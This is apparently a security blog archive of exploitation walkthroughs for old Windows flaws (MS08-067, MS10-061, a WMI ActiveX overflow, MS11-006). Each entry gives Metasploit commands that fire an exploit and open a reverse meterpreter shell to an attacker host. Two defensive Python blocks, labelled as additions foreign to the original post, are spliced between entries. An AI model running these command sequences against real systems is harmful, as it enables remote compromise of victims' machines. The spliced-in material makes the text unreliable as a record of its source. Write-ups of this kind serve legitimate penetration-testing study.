Tag Archives: Windows

MS08-067 : Microsoft Server Service Relative Path Stack Corruption

Timeline :

Milw0rm PoC provided by Stephen Lawler on 2008-10-23
Metasploit PoC provided by hdm on 2009-10-28
Microsoft patch “KB958644” provided on 2008-10-23

PoC provided by :

Brett Moore
hdm

Reference(s) :

CVE-2008-4250
MS08-067

Affected version(s) :

Microsoft Windows 2000 SP4
Windows XP SP2 & SP3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP1 & SP2
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition SP2
Windows Vista and Windows Vista SP1
Windows Vista x64 Edition and Windows Vista x64 Edition SP1
Windows Server 2008 for 32-bit Systems
Windows Server 2008 for x64-based Systems

Tested on Windows XP SP3 before KB958644

Description :

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.
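The flaw described above sits in path canonicalization, the routine that collapses `.` and `..` components of a path supplied by a remote caller. As an added example (not the NetAPI32 code and not part of the original post), the following Python canonicalizer shows the one check such a routine must make: a `..` that would walk above the root is refused rather than applied, instead of backtracking past the start of whatever holds the path. The function name and the root-relative rule are assumptions made for the illustration.

```python
# Added example: a bounded path canonicalizer (illustration, not the NetAPI32 routine).

def canonicalize(path: str) -> str:
    """Collapse '.' and '..' in a Windows-style path without climbing above the root.

    A leading separator marks a rooted path; the result keeps it. Both '\\' and '/'
    are accepted as separators and repeated separators are collapsed.
    Raises ValueError when a '..' would move above the root, which is the case a
    naive implementation handles by silently walking backwards past the start.
    """
    rooted = path.startswith(("\\", "/"))
    components = []
    for part in path.replace("/", "\\").split("\\"):
        if part in ("", "."):
            continue  # empty (doubled separator) and current-directory entries vanish
        if part == "..":
            if not components:
                # Bounds check: nothing left to pop, so the caller is asking to leave the root.
                raise ValueError("path traverses above the root: %r" % path)
            components.pop()
        else:
            components.append(part)
    return ("\\" if rooted else "") + "\\".join(components)


def is_safe_path(path: str) -> bool:
    """Convenience predicate: True when the path canonicalizes without leaving the root."""
    try:
        canonicalize(path)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    for sample in (r"\share\docs\..\pub\file.txt", r"\share\.\\pub", r"\a\..\..\b"):
        print(sample, "->", canonicalize(sample) if is_safe_path(sample) else "REJECTED")
```

The point of the example is the explicit bounds check on the component stack: every `..` is only honoured while there is a component to remove, so the routine can never be driven to index before the beginning of its own buffer.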

Commands :

nmap 192.168.178.41
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-061 : Microsoft Print Spooler Service Impersonation Vulnerability

Timeline :

Vulnerability exploited by the Stuxnet worm
Security update released by Microsoft (KB2347290) on 2010-09-14
Metasploit PoC released on 2010-09-17

PoC provided by :

jduck
hdm

Reference(s) :

CVE-2010-2729
MS10-061

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

Tested on Windows XP SP3

Description :

This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes an EXE and then (ab)uses the impersonation vulnerability a second time to create a secondary RPC connection to the \PIPE\ATSVC named pipe. We then proceed to create a remote AT job using a blind NetrJobAdd RPC call.
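The module description above gives a defender two concrete signals: the Print Spooler process creating an executable outside its own spool directory (straight into %SystemRoot%\system32, or elsewhere via a traversal in the requested file name), followed on the same host by a new AT job. As an added example, not part of the original post or of the Metasploit module, the Python below correlates file-create records per host on exactly those two signals. The record layout, host names, file names and the correlation window are all constructed for the illustration; real telemetry (Sysmon, EDR) would be mapped onto the same four fields.

```python
# Added example: correlate spooler executable drops with AT job creation (constructed telemetry).
import ntpath

SYSTEM32 = r"c:\windows\system32"
SPOOL_DIR = ntpath.join(SYSTEM32, "spool")          # driver and job files legitimately land here
SPOOLER_IMAGE = ntpath.join(SYSTEM32, "spoolsv.exe")
TASKS_DIR = r"c:\windows\tasks"                     # legacy AT scheduler writes At<N>.job here
EXEC_EXT = {".exe", ".dll", ".com", ".scr"}

# Constructed sample records: (host, sequence number, creating process image, created file).
SAMPLE_EVENTS = [
    ("ws03", 1, r"C:\Windows\System32\spoolsv.exe", r"C:\Windows\System32\spool\PRINTERS\00004.SPL"),
    ("ws01", 2, r"C:\Windows\System32\spoolsv.exe", r"C:\Windows\System32\sample.exe"),
    ("ws01", 3, r"C:\Windows\System32\svchost.exe", r"C:\Windows\Tasks\At1.job"),
    ("ws02", 4, r"C:\Windows\System32\spoolsv.exe", r"C:\Windows\System32\spool\..\dropped.exe"),
    ("ws03", 5, r"C:\Windows\System32\spoolsv.exe", r"C:\Windows\System32\spool\drivers\W32X86\3\unidrv.dll"),
    ("ws03", 6, r"C:\Windows\System32\svchost.exe", r"C:\Windows\Tasks\At2.job"),
]


def normalize(path):
    """Resolve '.' and '..' and lowercase, so traversal in the requested name cannot evade the check."""
    return ntpath.normpath(path).lower()


def under(path, directory):
    return path == directory or path.startswith(directory + "\\")


def is_spooler_drop(image, target):
    """Spooler writing an executable anywhere outside its own spool tree."""
    image, target = normalize(image), normalize(target)
    if image != SPOOLER_IMAGE or under(target, SPOOL_DIR):
        return False
    return ntpath.splitext(target)[1] in EXEC_EXT


def is_at_job(target):
    target = normalize(target)
    return under(target, TASKS_DIR) and target.endswith(".job")


def detect(events, window=5):
    """Per host: alert on a spooler executable drop, and escalate when an AT job follows within `window` events."""
    alerts = []
    pending = {}  # host -> (sequence of the drop, dropped file)
    for host, seq, image, target in sorted(events, key=lambda e: e[1]):
        if is_spooler_drop(image, target):
            dropped = normalize(target)
            pending[host] = (seq, dropped)
            alerts.append({"host": host, "seq": seq, "stage": "spooler_exe_drop", "file": dropped})
        elif is_at_job(target) and host in pending:
            drop_seq, dropped = pending.pop(host)
            if seq - drop_seq <= window:
                alerts.append({"host": host, "seq": seq, "stage": "exe_drop_then_at_job",
                               "file": dropped, "job": normalize(target)})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Two design points: the target path is normalized before any comparison, so the traversal the description mentions (`..` in the requested file name) resolves to the real destination; and files under the spool tree are excluded, because the spooler writes driver and job files there as part of normal printing and those would otherwise drown the rule in noise.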

Commands :

use exploit/windows/smb/ms10_061_spoolss
nmap 192.168.178.41
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

Microsoft WMI Administration Tools ActiveX Buffer Overflow

Timeline :

Vulnerability & PoC disclosed by WooYun on 2010-12-22
Metasploit PoC provided on 2010-12-22

PoC provided by :

WooYun
MC
jduck

Reference(s) :

CVE-2010-3973
CVE-2010-4588

Affected version(s) :

Microsoft WMI Administrative Tools 1.1

Tested on Windows XP SP3

Description :

On 22 December, WooYun, a security researcher, disclosed a vulnerability, accompanied by a PoC, in WMI Administrative Tools 1.1. These tools are not included by default in Microsoft Windows and must be installed separately on Windows XP. The same day, the Metasploit team released a module that industrializes the exploitation of this vulnerability. The vulnerability is identified by CVE-2010-3973 and CVE-2010-4588. At present, Microsoft has no planned patch.

Commands :

use exploit/windows/browser/wmi_admintools
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1

sysinfo
ipconfig

MS11-006 : Windows Thumbnails CreateSizedDIBSECTION Stack Buffer Overflow

Timeline :

Vulnerability disclosed by Moti & Xu Hao at POC2010 on 2010-12-15
CVE registered on 2010-12-22
PoC provided by the Metasploit team on 2011-01-04

PoC provided by :

Moti & Xu Hao
Yaniv Miron aka Lament of ilhack
jduck

Reference(s) :

CVE-2010-3970
MSA-2490606
MS11-006

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2

Tested on Windows XP SP3

Description :

Microsoft is once more the victim of an uncoordinated vulnerability disclosure. Moti Joseph & Xu Hao, two security researchers, revealed a new Microsoft Windows vulnerability on 15 December during the POC2010 conference. The disclosure drew no attention until December 22 (CVE-2010-3970), even though the POC2010 conference schedule had clearly indicated that a new Microsoft Windows vulnerability would be revealed. Perhaps this lack of attention is due to the conference being held in South Korea?

Again, shortly thereafter, information on this vulnerability circulated quickly among computer security professionals, culminating today in a public PoC provided by the Metasploit team. The presentation given by Moti Joseph & Xu Hao during the POC2010 conference is also available on Exploit-DB.

This vulnerability, which we can classify as critical, is fairly simple to exploit. When the content of a directory containing a forged Word or PowerPoint document is viewed in “Thumbnails” mode, arbitrary code can be executed with the privileges of the local user. Exploitation of this vulnerability is also possible through SharePoint.

A few hours after the release of the Metasploit PoC, Microsoft issued an advisory, MSA-2490606, identifying the vulnerable systems and providing mitigation solutions. Microsoft does not currently plan to provide an out-of-band patch for this vulnerability.

What is also interesting in the disclosure life cycle of this vulnerability is that the conference was announced on September 13, 2010, and at that time the organizers were looking for people interested in presenting their work. The deadline for paper submissions (CFP) was announced as October 15, 2010. This would mean that the vulnerability had been known well before October 15, 2010. Also worth noting is that Microsoft was a sponsor of this conference.

Commands :

use exploit/windows/fileformat/ms11_006_createsizeddibsection
set FILENAME msf.doc
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
ipconfig